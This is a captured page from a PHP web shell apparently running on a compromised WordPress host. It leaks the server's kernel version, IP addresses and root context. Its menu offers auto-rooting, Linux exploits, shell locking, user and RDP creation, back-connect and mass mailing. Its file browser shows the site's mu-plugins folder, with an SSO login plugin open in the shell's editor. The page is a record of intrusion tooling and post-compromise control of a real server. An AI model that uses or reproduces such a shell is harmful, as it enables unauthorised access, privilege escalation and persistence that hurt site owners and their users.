Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
insepet /
wp-content /
mu-plugins /
[ HOME SHELL ]
Name
Size
Permission
Action
sso.php
1.84
KB
-rw-r--r--
wp-staging-optimizer.php
5.49
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : sso.php
<?php /** Plugin Name: SSO Author: Garth Mortensen, Mike Hansen Version: 0.1 License: GPLv2 or later License URI: http://www.gnu.org/licenses/gpl-2.0.html */ function sso_check () { if ( ! isset( $_GET['salt'] ) || ! isset( $_GET['nonce'] ) || ! isset( $_GET['user'] ) ) { sso_req_login(); } if ( sso_check_blocked() ) { sso_req_login(); } $nonce = esc_attr( $_GET['nonce'] ); $salt = esc_attr( $_GET['salt'] ); $user = esc_attr( $_GET['user'] ); $bounce = esc_attr( $_GET['bounce'] ); $hash = base64_encode( hash( 'sha256', $nonce . $salt, false ) ); $hash = substr( $hash, 0, 64 ); if ( get_transient( 'sso_token' ) == $hash ) { if ( is_email( $user ) ) { $user = get_user_by( 'email', $user ); } else { $user = get_user_by( 'id', (int)$user ); } if ( is_a( $user, 'WP_User' ) ) { wp_set_current_user( $user->ID, $user->user_login ); wp_set_auth_cookie( $user->ID ); do_action( 'wp_login', $user->user_login ); delete_transient( 'sso_token' ); wp_safe_redirect( admin_url( $bounce ) ); } else { sso_req_login(); } } else { sso_add_failed_attempt(); sso_req_login(); } die(); } add_action( 'wp_ajax_nopriv_sso-check', 'sso_check' ); add_action( 'wp_ajax_sso-check', 'sso_check' ); function sso_req_login() { wp_safe_redirect( wp_login_url() ); } function sso_get_attempt_id() { return 'sso' . esc_url( $_SERVER['REMOTE_ADDR'] ); } function sso_add_failed_attempt() { $attempts = get_transient( sso_get_attempt_id(), 0 ); $attempts++; set_transient( sso_get_attempt_id(), $attempts, 300 ); } function sso_check_blocked() { $attempts = get_transient( sso_get_attempt_id(), 0 ); if ( $attempts > 4 ) { return true; } return false; }
Close
